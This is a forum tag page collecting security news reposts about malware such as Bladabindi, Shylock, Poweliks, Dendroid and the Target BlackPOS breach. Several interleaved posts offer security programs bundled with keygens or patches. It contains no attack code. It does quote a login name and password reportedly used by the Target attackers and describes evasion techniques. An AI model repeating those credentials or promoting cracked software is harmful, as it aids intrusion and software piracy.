Jump to content

Search the Community

Showing results for tags 'Malware'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Site Related
    • News & Updates
    • Site / Forum Feedback
    • Member Introduction
  • News
    • General News
    • FileSharing News
    • Mobile News
    • Software News
    • Security & Privacy News
    • Technology News
  • Downloads
    • nsane.down
  • General Discussions & Support
    • Filesharing Chat
    • Security & Privacy Center
    • Software Chat
    • Mobile Mania
    • Technology Talk
    • Entertainment Exchange
    • Guides & Tutorials
  • Off-Topic Chat
    • The Chat Bar
    • Jokes & Funny Stuff
    • Polling Station

Categories

  • Drivers
  • Filesharing
    • BitTorrent
    • eDonkey & Direct Connect (DC)
    • NewsReaders (Usenet)
    • Other P2P Clients & Tools
  • Internet
    • Download Managers & FTP Clients
    • Messengers
    • Web Browsers
    • Other Internet Tools
  • Multimedia
    • Codecs & Converters
    • Image Viewers & Editors
    • Media Players
    • Other Multimedia Software
  • Security
    • Anti-Malware
    • Firewalls
    • Other Security Tools
  • System
    • Benchmarking & System Info
    • Customization
    • Defrag Tools
    • Disc & Registry Cleaners
    • Management Suites
    • Other System Tools
  • Other Apps
    • Burning & Imaging
    • Document Viewers & Editors
    • File Managers & Archivers
    • Miscellaneous Applications
  • Linux Distributions

Categories

  • General News
  • File Sharing News
  • Mobile News
  • Software News
  • Security & Privacy News
  • Technology News

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

  1. Cyber security sleuths have alerted Indian Internet users against hacking attempts of a clandestine multi-identity virus - Bladabindi - which steals sensitive personal information of a user for nefarious purposes. The virus, the Computer Emergency Response Team-India (CERT-In) said, could infect "Microsoft Windows operating system" and it spread through removable USB flash drives, popularly known as pendrive and data cards, including other malwares. CERT-In is the nodal national agency to combat hacking, phishing and to fortify security-related defences of the Indian Internet domain. "It has been reported that variants of malware called Bladabindi are spreading. This malware steals sensitive user information from infected computer system. Bladabindi could also be used as malware downloader to propagate further malware and provide backdoor access to the remote attacker. "Some of the Bladabindi variants could capture keyboard press, control computer camera and later send collected sensitive information to remote attacker. Bladabindi is infecting Microsoft Windows operating system and spreading via infecting removable USB flash drives and via other malwares," the latest advisory by the agency said. The threat potential of the malware or the virus can be gauged from the fact that it can acquire as many as 12 aliases to conceal its real identity and later affect a computer system or personal information of a user. "Bladabindi variants can be created using a publicly available malicious hacker tool. Attacker can create a malicious file using any choice of icon to mislead or entice naive user into running the malicious file," the advisory said. The virus possesses a unique ability to acquire a safe network domain id in order to falsely add itself to the firewall exclusion list and bypass a user's firewall mechanism. A typical 'Bladabindi' variant propagates by way of copying themselves into the root folder of a removable drive and create a shortcut file with the name and folder icon of the drive. When the user clicks on the shortcut, the malware gets executed and Windows Explorer is opened and it makes it seem as if nothing malicious happened. A potential attack by the virus could result into the loss of important proprietary data of a user like "computer name, country and serial number, Windows user name, computer's operating system version, Chrome stored passwords, Firefox stored passwords, the agency said in the advisory. "The malware can also use infected computer's camera to record and steal personal information. It checks for camera drivers and installs a DLL plugin so it can record and upload the video to a remote attacker. The malware can also log or capture keystrokes to steal credentials like user names and passwords," the CERT-In cautioned users. The agency has also suggested some countermeasures against "Bladabindi'. "Scan computer system with the free removal tools, disable the autorun functionality in Windows, use USB clean or vaccination software, keep up-to-date patches and fixes on the operating system and application software, deploy up-to-date anti-virus and anti-spyware signatures at desktop and gateway level," the agency suggested. It also recommended users should not follow unsolicited web links or attachments in email messages, do not visit un-trusted websites, use strong passwords and also enable password policies, enable firewall at desktop and gateway level, guard against social engineering attacks and limit user privileges. Source: http://www.financialexpress.com/news/hacking-virus-bladabindi-prowling-in-india-targets-microsoft-windows-os/1273299/0
  2. GridinSoft Trojan Killer 2.2.3.9 GridinSoft Trojan Killer - advanced program to clean your computer of all malicious threats! If you - a permanent internet user, you should take steps to protect your personal information against cyber-criminals. Trojan Killer can help you in this matter! The program quickly identify (recognize) and immediately remove dangerous malicious Trojans - spyware and adware, malware blocking and restricting the activities of tools, keyloggers, etc. before irreversible painful events will come in the form of stolen accounts, passwords, credit card numbers, personal, corporate and other information. Trojan Killer is designed specifically to disable / remove Malware without the user having to manually edit system files or reestr.Programma also removes the additional system modifications that are ignored by some standard antivirus scanners. Trojan Killer scans ALL the files loaded at boot time, Adware, Spyware, Remote Access Trojans, Internet Worms and other malware. Trojan Killer works in a security system for providing security in computer systems. The program will help you get rid of annoying adware, malware and other rough tools. It is very important to restore control over your computer, and do not let anyone use your data. Additional tools:Reset Home Internet Explorer / Start / Search Page Settings Some Malware programs make changes to the main page of Internet Explorer, Start and Search Page settings, in order to redirect the web browser to different websites. This utility will reset the Home / Start / Search pages to standard Defaults. You can then manually reset your Home Page to your website of choice (or leave it "blank", the default). Restore the HOSTS fileWindows HOSTS file is a text file which stores website addresses. The file can be used to speed up access to websites you visit often - by equating the website name to its address DNS, web browser can find the website more quickly as it does not have to query a DNS-name Server. Some Malware programs add entries to this file, to either deny access to websites (usually security-related Web sites or antivirus company), or re-direct access to websites of their choosing. Reset Windows Update, politicianSome Malware programs attempt to prevent Windows Update, from running, and inhibit access to resetting Windows Update, by blanking out the Windows Update options on the Configure Update. Website: http://www.gridinsoft.com OS: Windows XP / Vista / 7 / 8 Language: Ml Medicine: Patch / Keymaker Size: 46,00 Mb.
  3. Researchers have discovered click fraud malware designed to “hide in plain sight” and evade traditional security tools by embedding data into an image file. Lurk is a downloader which uses digital steganography – the art of hiding information in images, audio or video files, according to a Dell SecureWorks Counter Threat Unit (CTU) Threat Intelligence paper by Brett Stone-Gross. “Lurk specifically uses an algorithm that can embed encrypted URLs into an image file by inconspicuously manipulating individual pixels. The resulting image contains additional data that is virtually invisible to an observer,” he wrote. “It is unlikely that existing IPS/IDS devices could detect data that is concealed with digital steganography. As a result, Lurk may be able to evade network defenses and hide in plain sight.” Lurk is comprised of two parts – a dropper DLL and a payload DLL, with the former’s main job being to extract and load the latter, he added. Once the main payload DLL executes, it checks the victim computer for 52 different security products and apparently won’t install if it discovers one of 21 specific products. “Steganography can make it exceedingly difficult to detect the presence of hidden information such as a configuration file, binary update, or bot command, especially in digital files,” concluded Stone-Gross. “As a result, the use of steganography in malware may become more prevalent in the future.” Source
  4. Like most profitable criminal enterprises, the Shylock banking malware thrived because it was supported by a nimble infrastructure that allowed it to stay one step ahead of network and security monitoring capabilities, and the authorities. That race ended this week. Europol announced today that it, along with numerous law enforcement and industry partners had carried out a successful takedown of the Shylock infrastructure. The two-day culmination of the operation took place on Tuesday and Wednesday and was coordinated by the U.K.’s National Crime Agency and supported by Europol, the FBI, GCHQ in the U.K., and industry companies including Kaspersky Lab, BAE Systems Applied Intelligence and Dell SecureWorks. “Law enforcement agencies took action to disrupt the system which Shylock depends on to operate effectively,” Europol said in a statement. “This comprised the seizure of servers which form the command and control system for the Trojan, as well as taking control of the domains Shylock uses for communication between infected computers.” Few details were provided on the location of the command and control infrastructure, but Europol said it coordinated investigative actions with cooperation from authorities in Italy, the Netherlands, Turkey, Germany, France and Poland. CERT-EU, Europol said, was also instrumental in providing data on the malicious domains used by Shylock. No arrests were announced, though Europol said that previously unknown parts of the Shylock infrastructure were uncovered and additional law enforcement action may be upcoming. “It has been a pleasure for me to see the international cooperation between police officers and prosecutors from many countries, and we have again tested our improved ability to rapidly react to cyber threats in or outside the EU,” Troels Oerting, head of the European Cybercrime Center at Europol. “It’s another step in the right direction for law enforcement and prosecutors in the EU and I thank all involved for their huge commitment and dedication.” Major takedowns of botnets and other cybercrime operations are quickly becoming commonplace. Though usually not a permanent solution, takedowns such as this one and the recentGameover Zeus takedown, which also impacted the Cryptolocker infrastructure, indicate improving cooperation between international law enforcement. “The NCA is coordinating an international response to a cybercrime threat to businesses and individuals around the world,” said Andy Archibald, Deputy Director of the NCA’s National Cyber Crime Unit in the U.K. “This phase of activity is intended to have a significant effect on the Shylock infrastructure, and demonstrates how we are using partnerships across sectors and across national boundaries to cut cybercrime.” Shylock, like Zeus, targeted banking credentials. Victims were usually tricked or lured into clicking on a malicious link that infected computers with the Trojan. Shylock surfaced in 2011 and at first was limited to the U.K., but quickly expanded into a global operations concentrating on victims in Europe and the United States. Online banking customers were victimized by Shylock’s man-in-the-browser style attacks against apredetermined list of as many as 60 banks. The Trojan would sniff out banking credentials and loot accounts. “Banking fraud campaigns are no longer one-off cases. We’ve seen a significant rise in these kinds of malicious operations,” said Sergey Golovanov, Principal Security Researcher at Kaspersky Lab. “To fight cybercrime, we provide threat intelligence to law enforcement agencies all over the world and cooperate with international organizations such as Europol. Global action brings positive results – an example being the operation targeting Shylock malware.” Golovanov said in 2013 the number of cyberattacks involving malware designed to steal financial data increased by 27.6 percent to reach 28.4 million. The attackers behind Shylock were also careful to hide its tracks. Like other similar malware, such as versions of PushDo, Zeus and TDL/TDSS, Shylock made good use of a domain generation algorithm to send stolen data back to the attackers. The DGA feature sidestepped detection and research efforts effectively, experts said. One version of Shylock that surfaced in January 2013 was capable of spreading through Skype, in addition to network shares and even removable USB drives. Ultimately, Shylock could also steal browser cookies, use web injects on infected browsers and download and execute files on compromised machines. This article was updated at 12:15 p.m. ET with comments from Kaspersky Lab. Source
  5. Cybercriminals always look for the weakest link they can leverage to make as many victims as possible, and it looks like web browsers with out-of-date plugins are the norm in Europe. Browser plugin update situation in Europe According to the latest statistics from the Germany-based Cyscon GmbH, a company specializing in detecting an mitigating cyber threats, the users of most countries in Europe rely on poorly updated web browsers to explore the online world, which translates into plenty of possible victims for the crooks. The company makes available an interactive map that shows, in percentage, the proportion of a country’s users that do not rely on a browser that integrate plugin components updated with the latest patches available. According to Cyscon’s statistics at the time of the writing, the European country whose users are more aware of the security risks posed by out of date web browsing software, is Netherlands, where 51% of the computer users have at least one plugin component in the browser that needs to be updated. Although this is an alarming value, the country whose users would be more prone to falling victim to a cybercriminal, is Croatia, where it appears that 97% of the users contributing to Cyscon’s statistics do not have installed all the updates for said components. It is followed by Republic of Moldova, with 94%, Serbia with 86% and Germany with 80%. As shown by these statistics, there is no country with users sufficiently aware of risk posed by an old component with security glitches, to report outdate information lower than 50%. Source
  6. ViRobot APT Shield 2.0 is the best PC security program to block attacks of vulnerabilities(include Zero-Day vulnerabilities and Drive-by download vulnerabilities) in applications and Windows OS(include Windows XP) in advance, and it is compatible with anti-malware programs.Especially, ViRobot APT Shield 2.0 will be the best choice for PCs which can not be upgraded Windows XP to higher version of Windows. Features 1. Response to variety attacks of application vulnerabilities. It blocks attacks that use vulnerabilities in advance for applications such as document programs(MS Office, Adobe Reader, ...), Web brewers(IE, Firefox, Chrome, ...), Media players, Messengers, Compression software, and etc. 2. Blocking vulnerabilities due to the end of Windows XP support. It prevents attacks that use vulnerabilities in advance for Windows which cannot be applied security patches. 3. Complementing in accordance with the limits of Signature-based anti-virus. By behavior-based technology, it blocks creation and execution of malicious code that exploits vulnerabilities, and it also doesn't need pattern update. 4. Blocking the acceleration of document leak for many unspecified targets. Recently, malicious code is using social engineering to exfiltrate important document from companies, but this product blocks it completely. 5. Handling systems which are difficult to update Windows security patches. It's a very light product, because it requires only minimal resources of Hardware. It's suitable for various environments which are difficult to update Windows security patches in enterprise. Functions 1. Enhanced detection for malicious code It can block Zero-Day attacks in advance.It's not necessary to concern about False/Positive, because it detects abnormal behaviors of applications.It's possible to detect malicious code in real time.2. Flexible scalability and low costs It's compatible with anti-malware products all around the world, it ensures flexible scalability.It can save cost compared to network-based detection solutions. (No extra charge excepted license fee)3. Management efficiency It's possible to control security systems by connection with integrated log equipment(e.g. ESM).Monitoring service is provided through installation of Web log server.4. Usability Pattern update is not required.It's simple to install(The installation takes less than 10 seconds.)The portion of end users' direct control is minimized.It uses minimum resource. (e.g. Memory usage : less than 10MB)Screenshots Blocking malicious code that exploits vulnerabilities in applications. Document program -MS office, Adobe reader, Ichitaro, etc. Web browser - IE, Firefox, Chrome, Safari, Opera, Java, Flash, ActiveX, etc. Media player - Real player, QuickTime player, Winamp, etc. Messenger - Skype, Yahoo, Google, . etc. Compression software -WinZip, WinRAR, 7-Zip, etc. Homepage: http://www.aptshield.net/ Download link: http://www.aptshield.net/apt_individual_download.html Requirements: CPU:Intel Pentium III 500MHz or Above RAM:512 MB or Above HDD:Free space more than 500 MB OS: Windows XP / Windows Vista / Windows 7 / Windows 8/Windows Server 2003 / Windows Server 2008 / Windows Server 2012 -x86 and x64.
  7. A new remote administration Trojan (RAT) receives command and control instructions through Yahoo Mail, and could be easily modified to communicate with its authors through Gmail or other popular webmail providers. This new RAT’s significance stems primarily from its ability to elude the notice of intrusion detection systems by operating over seemingly benign domains. According to an analysis written Paul Rascagnères of the German security firm G-Data and published by Virus Bulletin, RATs generally transmit the information they steal from victimized machines over a specified port, or by regularly connecting to remote server. Each of these behaviors are well-known flags that are likely to trigger detection on corporate networks. This RAT, known as IcoScript, has gone largely undetected since 2012. Part of the reason, Rascagnères explains, is because access to webmail services is rarely blocked or blacklisted in corporate environments and such traffic is very unlikely to be considered suspicious. IcoScript makes use of Component Object Model technology in Microsoft Windows, making HTTP requests for remote services through Internet Explorer. Another of its novelties is that it appears to use its uniquely tailored scripting language to perform various tasks. In the sample analyzed by G-Data, IcoScript connected to a Yahoo Mail account controlled by its authors. The authors manipulate the malware by sending specially crafted emails containing coded instructions. “Moreover,” Rascagnères writes, “the modular nature of the malware makes it very easy for the attackers to switch to another webmail service, such as Gmail, or even to use services like Facebook or LinkedIn to control the malware while running a low risk of the communication being blocked.” Incident response teams generally contain malware like this, Rascagnères claims, by blocking the URL on the proxy. However, in the case of IcoScript, these URLs are not easily blocked, because they originate from the servers of a trusted service. The efficacy of IcoScript is likely to increase if the attackers diversify the sources of their command can control, configuring samples of the malware to use any number of legitimate webmail providers, social networking sites, and cloud storage services. “The containment must be performed on the network flow in real time,” Rascagnères concludes. “This approach is harder to realize and to maintain. It demonstrates both that attackers know how incident response teams work, and that they can adapt their communication to make detection and containment both complicated and expensive.” Source
  8. A new form of persistent malware has been discovered, one which does not create any file on the disk and stores all activities in the registry. In a blog posted at the end of July, security researcher Paul Rascagneres of GData details the particularities of the new type of malware, dubbed Poweliks, whose methods he labels as “rather rare and new,” since everything is performed in the memory of the computer system and there are several layers of code to get through in order to avoid analysis. The attack vector is an email with a malcrafted Microsoft Word document attached. The vulnerability leveraged by the attackers is CVE-2012-0158, which affects Office and several other Microsoft products. It is not new, but many users are still using old versions of the software that could be compromised. Once the file is launched, the cybercriminals turn on the persistency feature of the malware by creating an encoded autostart key in the registry. It seems that the encoding technique used by the malware was originally created by Microsoft to safeguard their source code from being altered. In order to avoid detection by system tools, the registry key is hidden by providing a name in non-ASCII characters, which makes it unavailable to the Registry Editor (regedit.exe) in Windows. By creating the auto-start key, the attackers make sure that a reboot of the system does not remove it from the computer. By decoding the key, Rascagneres observed two sets of code: one that verified if the affected machine had Windows PowerShell installed, and another one, a Base64-encoded PowerShell script, for calling and executing the shellcode. According to the researcher, the shellcode executes the payload, which attempts to connect to a remote command and control (C&C) server for receiving instructions. There are multiple IP addresses for C&C servers, all hard-coded. The peculiarity of this malware is that it does not create any file on the disk, making it more difficult to be detected through classic protection mechanisms. “To prevent attacks like this, AV solutions have to either catch the file (the initial Word document) before it is executed (if there is one), preferably before it reached the customer’s email inbox. Or, as a next line of defense, they need to detect the software exploit after the file’s execution, or, as a last step, in-registry surveillance has to detect unusual behavior, block the corresponding processes and alert the user,” writes Rascagneres. This type of malicious behavior is not new though, as a sample was also analyzed on KernelMode.info in mid-July, this year. In that case, the same vulnerability was exploited through a malicious RTF attached to an email claiming to be from Canada Post and/or USPS mail service. Source: http://news.softpedia.com/news/Registry-Residing-Malware-Creates-No-File-for-Antivirus-To-Scan-453374.shtml#
  9. A new Remote Administration Tool for Google’s Android platform has become available in the darkest corners of the Internet. This particular type of tool is bundled into a malware package that has the ability to claim control of the devices of those who use an app that has been infected, effectively turning the unwitting smartphone or tablet into a spyware zombie. The latest addition to the arsenal of the unscrupulous goes by the name of “Dendroid” and is being sold on the underground market for as little as $300. A tool like this would normally pass by unnoticed, but Dendroid differs from others in the fact that it offers unlimited usage for the relatively small amount of money an individual has to part with. It also comes bundled with the unnerving ability to hide amongst legitimate apps on the Play Store without being detected by Google’s malware scanning abilities. The scary stuff begins when a user – who is none the wiser – installs an infected app onto their Android smartphone or tablet. The individual(s) responsible for infecting the app in the first place has the ability to gain remote access to the installed device and effectively take control of the hardware. This level of remote access would allow undetected access to photographs, stored data and message archives that are on the device. Perhaps more terrifying, it would also grant access to the microphone and camera modules. A number of researchers from Lookout Security have taken the time to look into Dendroid, and are surprised by the methods its developers have implemented purely just to evade detecting by Bouncer, Google’s malware detection software. It looks as if Dendroid was designed with evading Play Store security in mind. Amongst its numerous features, Dendroid features some relatively simple — yet unusual — anti-emulation detection code that helps it evade detection by Bouncer, Google’s anti-malware screening system for the play store. The introduction and availability of this latest sophisticated Remote Administration Tool further brings attention to the fact that the Android platform is relatively easy pickings for malicious types who are serious about embarking on malware activity. It seems that the market for these types of tools is so lucrative, and is becoming such a commonplace that security researchers involved in the field have furnished the software with the abbreviated name “RAT”. The Android platform is now responsible for a staggering 92% of all known malware on mobile platforms, which has risen from 47% two years ago. The question is, what will Google do about this, if anything? Source
  10. IObit Malware Fighter Pro 2.3.0.16 IObit Malware Fighter is an advanced malware & spyware removal utility that detects, removes the deepest infections, and protects your PC from various of potential spyware, adware, trojans, keyloggers, bots, worms, and hijackers. With the improved, unique "Dual-Core" engine and the heuristic malware detection, IObit Malware Fighter detects the most complex and deepest spyware and malware in a very fast and efficient way. Here are some key features of "IObit Malware Fighter": One-click Solution and Very Easy to Use: Traditional advantages of IObit products. We love simple and automatic styles.Complete PC Security Care: Anti-malware, anti-spyware, anti-adware, anti-trojan, anti-bots, and more. IObit Malware Fighter can assist your antivirus to defend any tricky and complex threats.Finds the Deepest Infections: Using DOG (Digital Original Gene), a novel heuristic malware detection method, while IObit Malware Fighter can find the most complex threats.Very Fast and Light Thanks to the improved, unique "Dual-Core" anti-malware engine, complicated analysis can be made faster now.Work with All Antivirus Products Everyone needs a qualified antivirus software, and IObit Malware Fighter will surely be the best mate for your current antivirus.Automated Working in the Background Just install it and forget it. This powerful utility works continuously, automatically and quietly in the background on your PC. You can set it as your schedule or just let it work automatically when your PC is idle.Automatic and Frequent Updates By the new-generation malware analysis system and our professional database team, IObit Malware Fighter catches the emerging dangerous malware in the Internet.Website: http://www.iobit.com OS: Windows XP / Vista / 7 / 8 / 8.1 Language: ML Medicine: Keygen / Key Size: 26,62 Mb.
  11. By Casey Johnston - Jan 28 2014, 7:00am AUSEST Updates turned some Chrome add-ons maliciousnot all browsers allow that. Customers complain about activity tracking in CRXMouse on Chrome, a particularly invasive add-on. In a recent revelation by OMG Chrome and the developer of the Chrome extension Add to Feedly, it came to light that Chrome extensions are capable of changing service or ownership under a users nose without much notification. In the case of Add to Feedly, a buyout meant thousands of users were suddenly subjected to injected adware and redirected links. Chromes regulations for existing extensions are set to change in June 2014. The changes should prevent extensions from being anything but simple and single-purpose in nature, with a single visible UI surface in Chrome and a single browser action or page action button, like the extensions made by Pinterest or OneTab. This has always been the policy, per a post to the Chromium blog back in December. But going forward, it will be enforced for all new extensions immediately and for all existing extensions retroactively beginning in June. Given how Chromes system of updates, design restrictions, and ownership seemed to have gotten ahead of itself, we decided to take a look at the policies of other browsers to see if their extensions could be subjected to a similar fate. While Chrome isnt the only browser where an Add To Feedly tale could be spun, it seems to be the most likely place for such an outcome. Firefox Mozillas Firefox differs from Chrome in that it has an involved review system for all extensions that go from developers to the front-end store. Reviewers will reject an extension if it violates any of the rules in Firefoxs extension development documents. One of these rules is no surprisesan add-on cant do anything it doesnt disclose to users, and existing add-ons cant change their functionality without notifying the user and getting their permission. Firefox puts add-ons with unexpected features, like advertising that supports the add-on financially, into a separate category. Users have to explicitly opt-in to these features, says Jonathan Nightingale, vice president of Firefox. This means that in these cases, users will see a screen offering them the additional features, says Nightingale. One example is FastestFox, which pops a tab at first install asking the user to enable ad injection from Superfish. It's how developers implement these opt-in screens that could provide for a possible loophole; the addition of advertising might be obscurable by language, and data tracking could be, too (it's permitted under Firefoxs rules, but it must be disclosed in a privacy policy). Still, the review policy and need for opt-in for these more pernicious features both help prevent users from having new functionality sprung on them. Safari Safari has extensive design documents for its extensions but no central clearinghouse for them like other browsers. Apple keeps a gallery of a chosen few extensions that must meet certain regulations, but these represent a small fraction of the extensions available. Data tracking of an extensions users is possible, per the design docs, as is ad manipulation. Unlike Chrome, but like Firefox, the download and installation of Safari extension updates must be manually approved by the user. There are no regulations for disclosing functionality changes or changes of ownership, however. Internet Explorer Microsofts browser absolves itself of responsibility for add-ons on a support page where it states, "While add-ons can make your browsing experience better by giving you access to great Web content, some add-ons can pose security, privacy, or performance risks. Make sure any add-ons you install are from a trusted source." Add on at your own risk. Like Apple, Microsoft maintains an exclusive gallery of vetted add-ons. The company encourages extension makers to get user consent for unexpected add-on functionality, but it doesnt require it or block extensions that dont do it. Markup-based extensions can only be installed from within the browser, and therefore these must have the users explicit consent according to Microsoft. Other than this infrastructure, nothing prevents IE add-ons from doing things like injecting ads or redirecting a browsing experience (remember, this was the former home of the invasive toolbar add-on). IE10 does have an add-on management window, but some add-ons, like the ad-injecting Buzzdcock, have to be removed as if they are full-fledged applications. Uninstalling a particularly invasive IE add-on. Opera The latest versions of Opera are able to use Chromium extensions, but unlike Chrome ones, they get a review process thats similar to Firefoxs. Most importantly in Opera, there are restrictions on the types of scripts an extension can run and how they handle ads. Andreas Bovens, head of developer relations at Opera Software, told Ars in an e-mail that Opera doesnt allow extensions that include ads or tracking in content scripts, so extensions that, for example, inject ads inside webpages the user visits are not allowed. Extensions can, however, have ads in their options pages or in the pop-up that is triggered by their button in the browsers interface. Every extension gets a review, and the review team takes special care to suss out the nature of any obfuscated JavaScript code. If some of the code is obfuscated, reviewers ask the developers for the unobfuscated code to look at as well as a link to the obfuscation tool. That way we can check that the input and output indeed match, Bovens says. When an extensions ownership is transferred or the extension is updated, its subject to the same rigorous review process as an extension thats being submitted for the first time, according to Bovens. An extension that goes from having no ads to injecting ads, as some Chrome extensions do, simply would not pass [Operas] review process, Bovens says. Retiring to the not-so-Wild West? While Chrome extensions may have a better ideology than those of some other browsers, the breadth and depth of functionality that Chrome extensions can have without any kind of review process means that Chrome users trust can get taken for granted. Its similar to the Google Play app store, in that way: pretty much anything can make it to the market, but enough user complaints can get it taken down, as in the case of Add to Feedly and Tweet This Page. Based on policy and practice, users who heavily rely on extensions or have been made wary of them by developers recent transgressions may be safer on browsers like Firefox and Opera, where regulations are a bit stricter and there are people to police them. But there can be downsides to a vetting process, too, mainly in terms of rate-limiting iteration and improvements, so its a matter of weighing options. Former home? This is the current home for an awful lot of crapware add-ons, like Conduit's search hijacker, or the Ask.com toolbar that still hasn't died a thousand deaths, even though it should. http://arstechnica.com/business/2014/01/seeking-higher-ground-after-chrome-extension-adwaremalware-problems
  12. IObit Malware Fighter Pro 2.3.0.10 IObit Malware Fighter is an advanced malware & spyware removal utility that detects, removes the deepest infections, and protects your PC from various of potential spyware, adware, trojans, keyloggers, bots, worms, and hijackers. With the improved, unique "Dual-Core" engine and the heuristic malware detection, IObit Malware Fighter detects the most complex and deepest spyware and malware in a very fast and efficient way. Here are some key features of "IObit Malware Fighter": One-click Solution and Very Easy to Use: Traditional advantages of IObit products. We love simple and automatic styles.Complete PC Security Care: Anti-malware, anti-spyware, anti-adware, anti-trojan, anti-bots, and more. IObit Malware Fighter can assist your antivirus to defend any tricky and complex threats.Finds the Deepest Infections: Using DOG (Digital Original Gene), a novel heuristic malware detection method, while IObit Malware Fighter can find the most complex threats.Very Fast and Light Thanks to the improved, unique "Dual-Core" anti-malware engine, complicated analysis can be made faster now.Work with All Antivirus Products Everyone needs a qualified antivirus software, and IObit Malware Fighter will surely be the best mate for your current antivirus.Automated Working in the Background Just install it and forget it. This powerful utility works continuously, automatically and quietly in the background on your PC. You can set it as your schedule or just let it work automatically when your PC is idle.Automatic and Frequent Updates By the new-generation malware analysis system and our professional database team, IObit Malware Fighter catches the emerging dangerous malware in the Internet.Website: http://www.iobit.com OS: Windows XP / Vista / 7 / 8 / 8.1 Language: ML Medicine: Keygen / Key Size: 26,82 Mb.
  13. 15 Jan 14 Last weekend, Target finally disclosed at least one cause of the massive data breach that exposed personal and financial information on more than 110 million customers: Malicious software that infected point-of-sale systems at Target checkout counters. Todays post includes new information about the malware apparently used in the attack, according to two sources with knowledge of the matter The seller of the point-of-sale memory dump malware allegedly used in the Target attack In an interview with CNBC on Jan. 12, Target CEO Gregg Steinhafel confirmed that the attackers stole card data by installing malicious software on point-of-sale (POS) devices in the checkout lines at Target stores. A report published by Reuters that same day stated that the Target breach involved memory-scraping malware. This type of malicious software uses a technique that parses data stored briefly in the memory banks of specific POS devices; in doing so, the malware captures the data stored on the cards magnetic stripe in the instant after it has been swiped at the terminal and is still in the systems memory. Armed with this information, thieves can create cloned copies of the cards and use them to shop in stores for high-priced merchandise. Earlier this month, U.S. Cert issued a detailed analysis of several common memory scraping malware variants. Target hasnt officially released details about the POS malware involved, nor has it said exactly how the bad guys broke into their network. Since the breach, however, at least two sources with knowledge of the ongoing investigation have independently shared information about the point-of-sale malware and some of the methods allegedly used in the attack. BLACK POS On Dec. 18, three days after Target became aware of the breach and the same day this blog broke the story, someone uploaded a copy of the point-of-sale malware used in the Target breach to ThreatExpert.com, a malware scanning service owned by security firm Symantec. The report generated by that scan was very recently removed, but it remains available via Google cache. According to sources, ttcopscli3acs is the name of the Windows computer name/domain used by the POS malware planted at Target stores; the username that the thieves used to log in remotely and download stolen card data was Best1_user; the password was BackupU$r According to a source close to the investigation, that threatexpert.com report is related to the malware analyzed at this Symantec writeup (also published Dec. 18) for a point-of-sale malware strain that Symantec calls Reedum (note the Windows service name of the malicious process is the same as the ThreatExpert analysis POSWDS). Interestingly, a search in Virustotal.com a Google-owned malware scanning service for the term reedum suggests that this malware has been used in previous intrusions dating back to at least June 2013; in the screen shot below left, we can see a notation added to that virustotal submission, 30503 POS malware from FBI. The source close to the Target investigation said that at the time this POS malware was installed in Targets environment (sometime prior to Nov. 27, 2013), none of the 40-plus commercial antivirus tools used to scan malware at virustotal.com flagged the POS malware (or any related hacking tools that were used in the intrusion) as malicious. They were customized to avoid detection and for use in specific environments, the source said. That source and one other involved in the investigation who also asked not to be named said the POS malware appears to be nearly identical to a piece of code sold on cybercrime forums called BlackPOS, a relatively crude but effective crimeware product. BlackPOS is a specialized piece of malware designed to be installed on POS devices and record all data from credit and debit cards swiped through the infected system. According the author of BlackPOS an individual who uses a variety of nicknames, including Antikiller the POS malware is roughly 207 kilobytes in size and is designed to bypass firewall software. The barebones budget version of the crimeware costs $1,800, while a more feature-rich full version including options for encrypting stolen data, for example runs $2,300. THE ATTACK Target has yet to honor a single request for comment from this publication, and the company has said nothing publicly about how this breach occurred. But according to sources, the attackers broke in to Target after compromising a company Web server. Somehow, the attackers were able to upload the malicious POS software to store point-of-sale machines, and then set up a control server within Targets internal network that served as a central repository for data hoovered by all of the infected point-of-sale devices. The bad guys were logging in remotely to that [control server], and apparently had persistent access to it, a source close to the investigation told KrebsOnSecurity. They basically had to keep going in and manually collecting the dumps. Its not clear what type of software powers the point-of-sale devices running at registers in Targets U.S. stores, but multiple sources say U.S. stores have traditionally used a home-grown software called Domain Center of Excellence, which is housed on Windows XP Embedded and Windows Embedded for Point of Service (WEPOS). Targets Canadian stores run POS devices from Retalix, a company recently purchased by payment hardware giant NCR. According to sources, the Retalix POS systems will be rolled out to U.S. Target locations gradually at some point in the future. WHO IS ANTIKILLER? A more full-featured Breadcrumbs-level analysis of this malware author will have to wait for another day, but for now there are some clues already dug up and assembled by Russian security firm Group-IB. Image: Securityaffairs.co Not long after Antikiller began offering his BlackPOS crimeware for sale, Group-IB published an analysis of it, stating that customers of major US banks, such as such as Chase (Newark, Delaware), Capital One (Virginia, Richmond), Citibank (South Dakota), Union Bank of California (California, San Diego), Nordstrom FSB Debit (Scottsdale, Arizona), were compromised by this malware. In his sales thread on at least one crime forum, Antikiller has posted a video of his product in action. As noted by Group-IB, there is a split second in the video where one can see a URL underneath the window being recorded by the authors screen capture software which reveals a profile at the Russian social networking site Vkontakte.ru. Group-IB goes on to link that account to a set of young Russian and Ukranian men who appear to be actively engaged in a variety of cybercrime activities, including distributed denial-of-service (DDoS) attacks and protests associated with the hackivist collective known as Anonymous. One final note: Dozens of readers have asked whether I have more information on other retailers that were allegedly victimized along with Target in this scheme. According to Reuters, smaller breaches on at least three other well-known U.S. retailers took place and were conducted using similar techniques as the one on Target. Rest assured that when and if I have information about related breaches I feel confident enough about to publish, you will read about it here first. http://krebsonsecurity.com/2014/01/a-first-look-at-the-target-intrusion-malware
  14. By Shona Ghosh Posted on 9 Jan 2014 at 15:21 Millions of PCs may have been infected by malware inserted into ads on Yahoo websites - and then used to mine bitcoins. Yahoo confirmed this week that hackers had managed to insert malware into ads displayed on some of its European sites, but hasn't said how many users have been affected. Security company Light Cyber estimates that several million PCs have been infected, and found the malware had been used to install Bitcoin-mining software on some machines. Separate estimates this week from security firm Fox-IT suggest the UK has one of the highest numbers of affected users. Light Cyber founder and vice president for product and strategy, Giora Engel, said the hackers were potentially building a huge network of Bitcoin-mining PCs, since the task is too labour intensive for one machine. He added that the malware had delivered other tools that gave hackers control over infected PCs. "This campaign downloaded a variety of different tools - some were malware to enable attackers to control each infected PC and steal passwords," he told PC Pro. "Other tools were more specific – the Bitcoin mining tool is not malware itself, it's something anyone can download and generate Bitcoin." Engel estimated that, with several million machines at their disposal, the hackers could be making $10,000 (approximately £6,000) a day. Security companies have said the number of Bitcoin-related attacks will rise this year, after the virtual currency shot up in value. One Bitcoin is currently worth around £500, though its value fluctuates. 